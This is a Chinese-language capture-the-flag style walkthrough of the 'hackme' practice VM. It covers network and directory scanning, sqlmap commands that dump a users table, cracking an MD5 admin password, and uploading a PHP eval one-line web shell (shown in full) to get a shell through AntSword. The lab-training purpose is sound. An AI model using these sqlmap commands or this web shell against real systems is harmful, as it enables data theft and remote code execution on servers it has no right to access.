1.安装靶机
点击 hackme.ova 文件,直接导入虚拟机,选择存储位置
2. 开启靶机
3. kali扫描同C段的ip,找到靶机ip
nmap 192.168.182.1/24
经判断,靶机ip为:192.168.182.157
开启端口 http 80 、ssh 远程连接 22
4. 浏览器访问ip
显示一个登录界面,有输入框,可能存在SQL注入 存在注册连接,后面可能会有用
5. kali的dirb扫描敏感目录:dirb "http://ip"
6.访问 index.php 和 /uploads/ 两个网址
index.php访问仍是登录界面
http://192.168.182.157/uploads/ 发现上传文件的目录,无上传位置,暂时没思路操作
7. 返回登录界面http://ip,注册一个用户,进行登录
登录成功,出现搜索框,尝试sql注入
8. 寻找注入
直接点击search,发现弹出多个书籍信息,选一个作为值进行注入判断过程
9. 使用OSINT,使用BurpSuite抓包,保存数据包为txt文件
10. kali使用sqlmap工具爆破
爆破数据库输入:sqlmap -r '/home/kali/Desktop/test.txt' --dbs
发现一个数据库: webapphacking
爆破数据表:sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking --tables
发现users表
爆破表数据:sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking -T users --dump
发现superadmin用户,密码:2386acb2cf356944177746fc92523983
32位,采用hash加密,尝试md5解码
md5解码网址:MD5免费在线解密破解_MD5在线加密-SOMD5
密码:Uncrackable
11.使用superadmin用户登录
退出账号后,再重新登录
出现上传界面,结合之前的/uploads/可查看上传文件的目录,尝试上传木马文件
12. 上传一句话木马文件进行尝试
<?php @eval($_POST['cmd']);?>
发现一句话木马直接上传成功
13.访问/uploads/页面,访问该木马文件
输入:http://192.168.182.157/uploads/
点击文件test1.php,进行访问 访问成功
14. 蚁剑尝试连接
连接成功,获取了shell
hackme文件解析漏洞靶机,此次练习仅做到获取shell。
练习到此结束,希望对各位有所帮助吧。仅供参考,有所不足请大家多见谅。
---------------2025/3/13 23;45